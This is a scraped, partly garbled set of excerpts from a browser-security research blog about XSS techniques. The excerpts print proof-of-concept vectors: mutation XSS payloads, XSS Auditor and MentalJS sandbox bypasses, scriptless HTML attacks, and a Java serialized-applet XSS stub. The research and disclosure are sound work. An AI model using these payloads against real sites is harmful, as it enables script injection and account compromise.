thespanner.co.uk
RPO
http://www.thespanner.co.uk/2014/03/21/rpo
Javascript blog with messed up syntax inside. Friday, 21 March 2014. Https:/ hackvertor.co.uk/public. Link href=styles.css rel=stylesheet type=text/css /. The link element above references style.css using a relative URL, depending where in the sites directory structure you are it will load the style sheet based on that. For example if you were in a directory called xyz then the style sheet would be loaded from xyz/style.css . I noticed something interesting with relative styles, manipulating the path of ...
thespanner.co.uk
mXSS
http://www.thespanner.co.uk/2014/05/06/mxss
Javascript blog with messed up syntax inside. Tuesday, 6 May 2014. Mutation XSS was coined by me and Mario Heiderich to describe an XSS vector that is mutated from a safe state into an unsafe unfiltered state. The most common form of mXSS is from incorrect reads of innerHTML. A good example of mXSS was discovered by Mario where the listing element mutated its contents to execute XSS. Listing <img src=1 onerror=alert(1)> /listing. Listing id=x <img src=1 onerror=alert(1)> /listing. If you try the above ve...
thespanner.co.uk
HTML scriptless attacks
http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks
Javascript blog with messed up syntax inside. Wednesday, 21 December 2011. Following up on @lcamtuf’s. Post about a “post xss” world. I thought I’d chip in with some vectors he missed. The textarea consumption technique he mentioned isn’t new and wasn’t invented by “Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson.” it was openly discussed on sla.ckers for many years (as usual) but anyway lets discuss vectors. Button as a scriptless vector. Option as a scriptless vector. Another interesting...
thespanner.co.uk
MentalJS bypasses
http://www.thespanner.co.uk/2014/06/24/mentaljs-bypasses
Javascript blog with messed up syntax inside. Tuesday, 24 June 2014. I managed to find time to fix a couple of MentalJS bypasses by LeverOne and Soroush Dalili (@irsdl). LeverOne’s vector was outstanding since it bypassed the parsing itself which is no easy task. The vector was as follows:. I/'/ alert(location);0)break/ '). For (var i$i$; / '/ alert(location);0)break/ '). For (var i$;i$ / '/ alert(location);0)break/ '). The entry ' MentalJS bypasses. Feed Both comments and pings are currently closed.
thespanner.co.uk
XSS Auditor bypass
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass
Javascript blog with messed up syntax inside. Tuesday, 10 February 2015. Script x = "MY INJECTION" /script. As every XSS hacker knows you can use a “ /script ” block to escape out of the script block and inject a HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector. Like so:. Script script alert(1) ". You could of course use a standard. But what if quotes are filtered? X = " /script svg script alert(1) "";. The entry ' XSS Auditor bypass. Comments are closed :(.
thespanner.co.uk
2015 June
http://www.thespanner.co.uk/2015/06
Javascript blog with messed up syntax inside. Archives for the Month of June, 2015. New IE mutation vector. Wednesday, 17 June 2015. I was messing around with a filter that didn’t correctly filter attribute names and allowed a blank one which enabled me to bypass it. I thought maybe IE had similar issues when rewriting innerHTML. Yes it does of course The filter bypass worked like this: img = script alert(1) /script The filter incorrectly assumed it was still inside […].
thespanner.co.uk
Security
http://www.thespanner.co.uk/category/security
Javascript blog with messed up syntax inside. Archives for the ‘Security’ Category. Earlier Entries ». New IE mutation vector. Wednesday, 17 June 2015. Comments Off on New IE mutation vector. How I smashed MentalJS. Sunday, 3 May 2015. Comments Off on How I smashed MentalJS. Friday, 6 March 2015. Comments Off on MentalJS DOM bypass. Another XSS auditor bypass. Thursday, 19 February 2015. This bug is similar to the last one I posted but executes in a different context. It requires an existing script a...
thespanner.co.uk
Online Javascript LAN scanner
http://www.thespanner.co.uk/2007/07/28/online-javascript-lan-scanner
Javascript blog with messed up syntax inside. Online Javascript LAN scanner. Saturday, 28 July 2007. I’ve really enjoyed making this tool, it started off as a port scanner then it evolved into a router scanner and now I’ve decided to accept any device on a LAN. The code now works on Firefox and IE7 (which was a pain), I haven’t managed to test it on any other browser so please leave a comment if you find any problems. IE7 is super quick to scan, I think this is because timed out connections don’t a...
thespanner.co.uk
java
http://www.thespanner.co.uk/category/java
Javascript blog with messed up syntax inside. Archives for the ‘java’ Category. Tuesday, 6 May 2014. In this post I will explore Java serialized applets and how they can be used for XSS. A serialized applet contains code that can be easily stored and loaded. Java supports an attribute called object which accepts a url to a serialized class file this allows us to load applets of our choosing provided they […]. Comments Off on Java Serialization. On Sandboxing and parsing jQuery in 100ms.
thespanner.co.uk
Java Serialization
http://www.thespanner.co.uk/2014/05/06/java-serialization
Javascript blog with messed up syntax inside. Tuesday, 6 May 2014. In order to create a serializable Java applet you need the following code (You also need to add plugin.jar to the class path):. Import java.applet.*;. Import netscape.javascript.*;. Public class XSS extends Applet implements java.io.Serializable {. Public void init() {. JSObject win = (JSObject) JSObject.getWindow(this);. Applet object="xss.ser" codebase="http:/ any url here containing the class and serialized data" /applet. Applet param ...
SOCIAL ENGAGEMENT